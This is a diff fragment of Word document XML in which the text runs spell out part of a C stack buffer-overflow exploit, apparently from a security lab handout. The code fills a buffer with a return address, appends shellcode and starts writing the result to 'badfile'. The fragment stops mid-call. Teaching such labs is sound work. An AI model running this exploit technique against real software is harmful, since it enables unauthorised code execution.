+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt; 20; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>++)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      *(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>addrptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">++) = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>retaddr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Fill the end of buffer with our shellcode */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 0; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(shellcode); </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">++) </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>num</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>] = shellcode[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>];</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Null terminate our shellcode at end of buffer */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>buffer[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>sizeof</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>(buffer) - 1] = '\0';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    /* Save the contents to the file "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>" */</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>badfile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fopen</w:t>
+      </w:r>
